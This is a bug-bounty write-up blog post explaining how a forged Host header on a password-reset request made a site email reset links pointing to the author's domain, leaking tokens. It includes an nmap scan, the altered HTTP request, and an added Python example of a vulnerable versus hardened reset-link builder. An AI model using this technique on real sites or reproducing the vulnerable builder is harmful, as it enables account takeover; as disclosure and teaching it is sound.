How I was able to steal the password reset token of any user, with severity: “P2”

Abhishek Morla
2 min read · Jan 8, 2021

Hey, I’m abhishekmorla, just a beginner in bug hunting.

Here we go:

This article is about a vulnerability (Host Header Injection) I was able to find in a BugCrowd private program. The scope was amazing: an IP range, 2xx.xxx.xx.xxx/28.

So I quickly scanned the range with nmap:

nmap -p80 2xx.xxx.xx.xxx/28 -oG - | grep 80/open

and the results were:
Host: 2xx.xxx.xx.xx1 () Ports: 80/open/tcp//http///
Host: 2xx.xxx.xx.xx2 () Ports: 80/open/tcp//http///
Host: 2xx.xxx.xx.xx3 () Ports: 80/open/tcp//http///
Host: 2xx.xxx.xx.xx4 () Ports: 80/open/tcp//http///
Host: 2xx.xxx.xx.xx5 () Ports: 80/open/tcp//http///
Host: 2xx.xxx.xx.xx6 () Ports: 80/open/tcp//http///

I opened some of the above IPs in my browser and one of them redirected to a login page. Then I clicked on the reset password page, where I entered the victim’s email address.

Post Request:

POST /passwords/forgot HTTP/1.1
Host: mysite.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 626
Connection: close
Cookie: _ga=GA1.2.2543534.34543563; ajs_user_id=null; ajs_group_id=null; _gcl_au=1.1.467456.1568844739; ei_client_id=13423rf46534g…….

I entered the victim’s email and captured the request in Burp. By changing the Host header to mysite.com, the victim will receive an email with the password reset link.

Response:

HTTP/1.0 302 Found
Cache-Control: no-cache
Content-Length: 134
Content-Type: text/html; charset=utf-8
Date: Fri, 18 Sep 2020 14:20:51 GMT
Location: https://mysite.com
Server: nginx
Connection: close

That email contains the password reset token (shown below). When the victim clicks the link, the attacker is able to get the token and thus reset the password.

Email

Click on the following link to reset your password:

http://www.mysite.com/passwords/forgot/a248d8b06e7b25a116851234f454yt0d9fb197dadc04f30185512eecc811

In this way the victim receives the malicious link in their email and, when they click it, the user’s password reset link / token is leaked to the attacker’s site (mysite.com), leading to full account takeover.
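To make the root cause concrete, here is an added example (not code from the original post or from the affected program) showing a reset-link builder that trusts the request’s Host header beside a hardened version that uses a configured canonical base URL and an allowlist. The hostnames, the base URL and the token value are constructed placeholders.

```python
from urllib.parse import urlsplit

# Constructed configuration standing in for the real application's settings.
CANONICAL_BASE = "https://www.example-target.test"              # assumed
ALLOWED_HOSTS = {"www.example-target.test", "example-target.test"}  # assumed
RESET_PATH = "/passwords/forgot/"  # path pattern seen in the write-up's email


def vulnerable_reset_link(headers: dict, token: str) -> str:
    """Mirrors the flaw in the write-up: the link is built from whatever Host
    header the client sent, so 'Host: mysite.com' yields a link to mysite.com
    and the token is handed to that host when the victim clicks."""
    host = headers.get("Host", "")
    return f"http://{host}{RESET_PATH}{token}"


def host_is_allowed(host_header: str) -> bool:
    """Normalise the Host header (case, optional port) and check the allowlist."""
    host = host_header.split(":", 1)[0].strip().lower()
    return host in ALLOWED_HOSTS


def safe_reset_link(headers: dict, token: str) -> str:
    """Hardened form: reject requests for unexpected hosts outright, and never
    derive the link from the request; use the configured canonical base URL."""
    host_header = headers.get("Host", "")
    if not host_is_allowed(host_header):
        raise ValueError(f"unexpected Host header: {host_header!r}")
    return f"{CANONICAL_BASE}{RESET_PATH}{token}"


def link_is_trusted(link: str) -> bool:
    """Review check for a generated link: HTTPS and a first-party hostname."""
    parts = urlsplit(link)
    return parts.scheme == "https" and parts.hostname in ALLOWED_HOSTS


if __name__ == "__main__":
    token = "CONSTRUCTED_TOKEN_PLACEHOLDER"  # placeholder, not a real token
    forged = {"Host": "mysite.com"}          # the header value used in the post
    print("vulnerable:", vulnerable_reset_link(forged, token))   # -> mysite.com
    print("trusted?   ", link_is_trusted(vulnerable_reset_link(forged, token)))
    print("hardened:  ", safe_reset_link({"Host": "www.example-target.test"}, token))
```

The same rule applies to X-Forwarded-Host and similar proxy headers, which are equally under the client’s control unless a trusted reverse proxy overwrites them.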

Thanks for reading!

LinkedIn: https://www.linkedin.com/in/abhishekmorla/

Twitter: https://twitter.com/abhishekmorla


Abhishek Morla

Security Consultant | CSE Student | Synack Red Team & Yogosha Member | Detectify Crowdsource Member | Prohacker at HacktheBox | 40+ Hall of fame